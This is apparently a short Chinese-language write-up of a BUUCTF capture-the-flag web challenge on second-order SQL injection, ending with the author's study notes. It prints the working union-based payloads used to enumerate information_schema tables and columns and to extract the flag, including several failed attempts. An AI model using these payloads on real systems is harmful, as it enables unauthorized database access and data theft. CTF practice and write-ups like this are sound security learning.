53，【3】BUUCTF WEB october 2019 Twice SQLinjection

题目得到信息，2次注入，进入靶场

登录页面，很自然想到SQL

第一次注入应该是这个可以登录，注册，提交简介的页面

第二次注入应该是在info处注入，信息显示在简介处

 

我真的纯脑子有病，人家二次注入不是注入两次，是一次注入通过两次操作实现，如下所示

 

 

被转义了

不过恶意语句输两次就可以了

 

database()库名ctftraining

1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#

表名flag,news,users

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

字段名flag

1' union select group_concat(flag) from ctftraining.flag#

？？？？注册失败？？？？

修改修改

1' union select flag from ctftraining.flag#

？？？？？？最后一步不显示flag

再修改修改

1' union select flag from flag#

这句就对了

得到flag

 

笔记

1，SQL注入还有2次注入的类型

2，爆出信息的语句需要多次修改

3，看到陌生词语先搜搜，不能想当然